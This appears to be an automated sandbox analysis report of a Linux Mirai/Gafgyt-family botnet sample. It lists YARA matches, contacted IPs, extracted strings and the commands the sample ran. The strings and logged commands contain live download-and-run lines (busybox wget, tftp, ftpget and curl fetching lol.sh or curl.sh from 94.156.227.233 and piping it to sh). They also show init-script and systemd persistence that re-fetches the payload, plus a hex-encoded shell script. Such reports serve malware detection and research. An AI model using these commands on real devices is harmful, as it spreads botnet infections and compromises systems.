Source: unknown |
TCP traffic detected without corresponding DNS query: 69.205.239.214 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 5.97.127.42 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 3.22.115.13 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 104.250.157.28 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 80.217.188.196 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.165.16.185 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 165.51.231.8 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 192.149.150.148 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 23.127.31.64 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 188.40.208.246 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 108.94.73.145 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 35.234.64.95 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 189.226.49.88 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 159.55.3.136 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 218.17.161.66 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 174.2.98.98 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 33.218.116.225 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 212.181.56.101 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 211.66.84.66 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 5.230.87.127 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 193.225.180.215 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 19.221.217.219 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 17.66.193.188 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 194.223.253.142 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 192.61.215.223 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 150.111.214.239 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 39.231.196.229 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 134.24.127.82 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 168.172.114.125 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 132.17.43.69 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 63.141.202.242 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 66.167.12.32 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 220.125.3.185 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 211.44.130.11 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 217.158.37.212 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 119.97.159.31 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 188.11.187.110 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 213.134.20.231 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 216.9.184.183 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 23.178.1.162 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 37.62.153.105 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 124.18.178.197 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 154.100.105.75 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 209.253.162.166 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 19.219.216.216 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 24.251.173.55 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 123.227.62.28 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 156.173.48.48 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 84.49.66.235 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 205.49.27.99 |
Source: x86_32.nn.elf, sh.32.dr, profile.12.dr, system.12.dr, inittab.12.dr, bootcmd.12.dr, custom.service.12.dr |
String found in binary or memory: http://94.156.227.233/ |
Source: x86_32.nn.elf |
String found in binary or memory: http://94.156.227.233/curl.sh |
Source: x86_32.nn.elf |
String found in binary or memory: http://94.156.227.233/lol.sh |
Source: x86_32.nn.elf |
String found in binary or memory: http://94.156.227.233/oro1vk/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/s |
Source: x86_32.nn.elf, type: SAMPLE |
Matched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown |
Source: x86_32.nn.elf, type: SAMPLE |
Matched rule: Linux_Trojan_Mirai_fa3ad9d0 Author: unknown |
Source: x86_32.nn.elf, type: SAMPLE |
Matched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown |
Source: x86_32.nn.elf, type: SAMPLE |
Matched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown |
Source: x86_32.nn.elf, type: SAMPLE |
Matched rule: Linux_Trojan_Mirai_88de437f Author: unknown |
Source: x86_32.nn.elf, type: SAMPLE |
Matched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown |
Source: x86_32.nn.elf, type: SAMPLE |
Matched rule: Linux_Trojan_Mirai_cc93863b Author: unknown |
Source: x86_32.nn.elf, type: SAMPLE |
Matched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown |
Source: 6215.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY |
Matched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown |
Source: 6215.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY |
Matched rule: Linux_Trojan_Mirai_fa3ad9d0 Author: unknown |
Source: 6215.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY |
Matched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown |
Source: 6215.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY |
Matched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown |
Source: 6215.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY |
Matched rule: Linux_Trojan_Mirai_88de437f Author: unknown |
Source: 6215.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY |
Matched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown |
Source: 6215.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY |
Matched rule: Linux_Trojan_Mirai_cc93863b Author: unknown |
Source: 6215.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY |
Matched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown |
Source: Initial sample |
String containing 'busybox' found: /bin/busybox |
Source: Initial sample |
String containing 'busybox' found: getinfo xxx/proc/self/exe(deleted)/proc/%s/exe/proc/..%s/%ssize=10Mtmpfs/tmp/tt/tmp/tt/system/proc/%d/proc/proc/%u/statusPPid:/proc/%u/cmdline-bash-sh/bin/sh94.156.227.2342surf2/proc/%d/exe/ /proc-altered/tmp/.socket/proc/%d/mountinfo/usr/lib/systemd/*/usr/sbin/*/usr/sbin/agetty/usr/sbin/cron/usr/lib/policykit-1/polkitd/usr/bin/dbus-daemon/usr/lib/openssh/sftp-server-sshd**deamon*/opt/app/monitor/z/secom//usr/lib/sys/media/srv/sbin/httpdtelnetddropbearencoder/var/tmp/wlancontarm.nnarm5.nnarm6.nnm68k.nnmips.nnmipsel.nnpowerpc.nnsparc.nnx86_32.nnx86_64.nntelnet.nn/initvar/Challengeapp/hi3511gmDVRiboxusr/dvr_main _8182T_1108mnt/mtd/app/guivar/Kylinl0 c/udevdvar/tmp/soniahicorestm_hi3511_dvr/bin/busybox/usr/lib/systemd/systemdhome/Davincissh/var/spool/var/Sofiasshd/usr/compress/bin//compress/bin/compress/usr//root/dvr_gui//root/dvr_app//anko-app//opt/wgetcurlping/pswiresharkechotcpdumpnetstatpythoniptablesnanonvimgdbpkillkillallapt/bin/loginFound And Killed Process: PID=%d, Realpath=%s, Bot-ID:%s/snap/snapd/15534 |
Source: Initial sample |
String containing 'busybox' found: usage: busybox |
Source: Initial sample |
String containing 'busybox' found: /bin/busybox hostname PBOC |
Source: Initial sample |
String containing 'busybox' found: /bin/busybox echo > |
Source: Initial sample |
String containing 'busybox' found: /bin/busybox echo -ne |
Source: Initial sample |
String containing 'busybox' found: /bin/busybox wget http://94.156.227.233/lol.sh -O- | sh; |
Source: Initial sample |
String containing 'busybox' found: /bin/busybox tftp -g http://94.156.227.233/ -r lol.sh -l- | sh; |
Source: Initial sample |
String containing 'busybox' found: /bin/busybox ftpget http://94.156.227.233/ lol.sh lol.sh && sh lol.sh; |
Source: Initial sample |
String containing 'busybox' found: /bin/busybox chmod +x .d; ./.d; ./dvrHelper selfrep |
Source: Initial sample |
String containing 'busybox' found: incorrectinvalidbadwrongfaildeniederrorretryenablelinuxshellping ;shusage: busybox/bin/busybox hostname PBOC/bin/busybox echo > .b && sh .b && cd /bin/busybox echo -ne >> >sh .k94.156.227.233GET /dlr. HTTP/1.0 |
Source: Initial sample |
String containing 'busybox' found: .dThe Gorilla/var//var/run//var/tmp//dev//dev/shm//etc//mnt//boot//home/armarm5arm6arm7mipsmpslppcspcsh4/bin/busybox wget http://94.156.227.233/lol.sh -O- | sh;/bin/busybox tftp -g http://94.156.227.233/ -r lol.sh -l- | sh;/bin/busybox ftpget http://94.156.227.233/ lol.sh lol.sh && sh lol.sh;curl http://94.156.227.233/curl.sh -o- | sh/bin/busybox chmod +x .d; ./.d; ./dvrHelper selfrep"\x23\x21\x2F\x62\x69\x6E\x2F\x73\x68\x0A\x0A\x66\x6F\x72\x20\x70\x72\x6F\x63\x5F\x64\x69\x72\x20\x69\x6E\x20\x2F\x70\x72\x6F\x63""\x2F\x2A\x3B\x20\x64\x6F\x0A\x20\x20\x20\x20\x70\x69\x64\x3D\x24\x7B\x70\x72\x6F\x63\x5F\x64\x69\x72\x23\x23\x2A\x2F\x7D\x0A\x0A""\x20\x20\x20\x20\x72\x65\x73\x75\x6C\x74\x3D\x24\x28\x6C\x73\x20\x2D\x6C\x20\x22\x2F\x70\x72\x6F\x63\x2F\x24\x70\x69\x64\x2F\x65""\x78\x65\x22\x20\x32\x3E\x20\x2F\x64\x65\x76\x2F\x6E\x75\x6C\x6C\x29\x0A\x0A\x20\x20\x20\x20\x69\x66\x20\x5B\x20\x22\x24\x72\x65""\x73\x75\x6C\x74\x22\x20\x21\x3D\x20\x22\x24\x7B\x72\x65\x73\x75\x6C\x74\x25\x28\x64\x65\x6C\x65\x74\x65\x64\x29\x7 |
Source: /tmp/x86_32.nn.elf (PID: 6284) |
SIGKILL sent: pid: 788, result: successful |
Jump to behavior |
Source: /tmp/x86_32.nn.elf (PID: 6284) |
SIGKILL sent: pid: 884, result: successful |
Jump to behavior |
Source: /tmp/x86_32.nn.elf (PID: 6284) |
SIGKILL sent: pid: 1664, result: successful |
Jump to behavior |
Source: /tmp/x86_32.nn.elf (PID: 6284) |
SIGKILL sent: pid: 2096, result: successful |
Jump to behavior |
Source: /tmp/x86_32.nn.elf (PID: 6284) |
SIGKILL sent: pid: 2102, result: successful |
Jump to behavior |
Source: /tmp/x86_32.nn.elf (PID: 6284) |
SIGKILL sent: pid: 6253, result: successful |
Jump to behavior |
Source: /tmp/x86_32.nn.elf (PID: 6284) |
SIGKILL sent: pid: 6340, result: successful |
Jump to behavior |
Source: x86_32.nn.elf, type: SAMPLE |
Matched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16 |
Source: x86_32.nn.elf, type: SAMPLE |
Matched rule: Linux_Trojan_Mirai_fa3ad9d0 reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = fe93a3552b72b107f95cc5a7e59da64fe84d31df833bf36c81d8f31d8d79d7ca, id = fa3ad9d0-7c55-4621-90fc-6b154c44a67b, last_modified = 2021-09-16 |
Source: x86_32.nn.elf, type: SAMPLE |
Matched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16 |
Source: x86_32.nn.elf, type: SAMPLE |
Matched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16 |
Source: x86_32.nn.elf, type: SAMPLE |
Matched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16 |
Source: x86_32.nn.elf, type: SAMPLE |
Matched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26 |
Source: x86_32.nn.elf, type: SAMPLE |
Matched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26 |
Source: x86_32.nn.elf, type: SAMPLE |
Matched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26 |
Source: 6215.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY |
Matched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16 |
Source: 6215.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY |
Matched rule: Linux_Trojan_Mirai_fa3ad9d0 reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = fe93a3552b72b107f95cc5a7e59da64fe84d31df833bf36c81d8f31d8d79d7ca, id = fa3ad9d0-7c55-4621-90fc-6b154c44a67b, last_modified = 2021-09-16 |
Source: 6215.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY |
Matched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16 |
Source: 6215.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY |
Matched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16 |
Source: 6215.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY |
Matched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16 |
Source: 6215.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY |
Matched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26 |
Source: 6215.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY |
Matched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26 |
Source: 6215.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY |
Matched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26 |
Source: /tmp/x86_32.nn.elf (PID: 6275) |
File opened: /proc/6377/status |
Jump to behavior |
Source: /tmp/x86_32.nn.elf (PID: 6275) |
File opened: /proc/6357/status |
Jump to behavior |
Source: /tmp/x86_32.nn.elf (PID: 6275) |
File opened: /proc/6379/status |
Jump to behavior |
Source: /tmp/x86_32.nn.elf (PID: 6275) |
File opened: /proc/6378/status |
Jump to behavior |
Source: /tmp/x86_32.nn.elf (PID: 6275) |
File opened: /proc/6391/status |
Jump to behavior |
Source: /tmp/x86_32.nn.elf (PID: 6275) |
File opened: /proc/6390/status |
Jump to behavior |
Source: /tmp/x86_32.nn.elf (PID: 6275) |
File opened: /proc/6392/status |
Jump to behavior |
Source: /tmp/x86_32.nn.elf (PID: 6275) |
File opened: /proc/1477/cmdline |
Jump to behavior |
Source: /tmp/x86_32.nn.elf (PID: 6275) |
File opened: /proc/799/cmdline |
Jump to behavior |
Source: /tmp/x86_32.nn.elf (PID: 6275) |
File opened: /proc/6340/status |
Jump to behavior |
Source: /tmp/x86_32.nn.elf (PID: 6275) |
File opened: /proc/6362/status |
Jump to behavior |
Source: /tmp/x86_32.nn.elf (PID: 6275) |
File opened: /proc/6384/status |
Jump to behavior |
Source: /tmp/x86_32.nn.elf (PID: 6275) |
File opened: /proc/6361/status |
Jump to behavior |
Source: /tmp/x86_32.nn.elf (PID: 6275) |
File opened: /proc/6383/status |
Jump to behavior |
Source: /tmp/x86_32.nn.elf (PID: 6275) |
File opened: /proc/6386/status |
Jump to behavior |
Source: /tmp/x86_32.nn.elf (PID: 6275) |
File opened: /proc/6363/status |
Jump to behavior |
Source: /tmp/x86_32.nn.elf (PID: 6275) |
File opened: /proc/6385/status |
Jump to behavior |
Source: /tmp/x86_32.nn.elf (PID: 6275) |
File opened: /proc/6388/status |
Jump to behavior |
Source: /tmp/x86_32.nn.elf (PID: 6275) |
File opened: /proc/6387/status |
Jump to behavior |
Source: /tmp/x86_32.nn.elf (PID: 6275) |
File opened: /proc/6389/status |
Jump to behavior |
Source: /tmp/x86_32.nn.elf (PID: 6275) |
File opened: /proc/6380/status |
Jump to behavior |
Source: /tmp/x86_32.nn.elf (PID: 6275) |
File opened: /proc/6360/status |
Jump to behavior |
Source: /tmp/x86_32.nn.elf (PID: 6275) |
File opened: /proc/6382/status |
Jump to behavior |
Source: /tmp/x86_32.nn.elf (PID: 6275) |
File opened: /proc/6040/cmdline |
Jump to behavior |
Source: /tmp/x86_32.nn.elf (PID: 6275) |
File opened: /proc/6381/status |
Jump to behavior |
Source: /tmp/x86_32.nn.elf (PID: 6275) |
File opened: /proc/6337/status |
Jump to behavior |
Source: /tmp/x86_32.nn.elf (PID: 6275) |
File opened: /proc/6359/status |
Jump to behavior |
Source: /tmp/x86_32.nn.elf (PID: 6275) |
File opened: /proc/6336/status |
Jump to behavior |
Source: /tmp/x86_32.nn.elf (PID: 6275) |
File opened: /proc/6358/status |
Jump to behavior |
Source: /tmp/x86_32.nn.elf (PID: 6275) |
File opened: /proc/6339/status |
Jump to behavior |
Source: /tmp/x86_32.nn.elf (PID: 6225) |
Shell command executed: sh -c "systemctl enable custom.service >/dev/null 2>&1" |
Jump to behavior |
Source: /tmp/x86_32.nn.elf (PID: 6261) |
Shell command executed: sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1" |
Jump to behavior |
Source: /tmp/x86_32.nn.elf (PID: 6263) |
Shell command executed: sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1" |
Jump to behavior |
Source: /tmp/x86_32.nn.elf (PID: 6265) |
Shell command executed: sh -c "echo \"#!/bin/sh\n# /etc/init.d/sh\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting sh'\n /bin/sh &\n wget http://94.156.227.233/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping sh'\n killall sh\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/sh" |
Jump to behavior |
Source: /tmp/x86_32.nn.elf (PID: 6266) |
Shell command executed: sh -c "chmod +x /etc/init.d/sh >/dev/null 2>&1" |
Jump to behavior |
Source: /tmp/x86_32.nn.elf (PID: 6268) |
Shell command executed: sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1" |
Jump to behavior |
Source: /tmp/x86_32.nn.elf (PID: 6270) |
Shell command executed: sh -c "ln -s /etc/init.d/sh /etc/rc.d/S99sh >/dev/null 2>&1" |
Jump to behavior |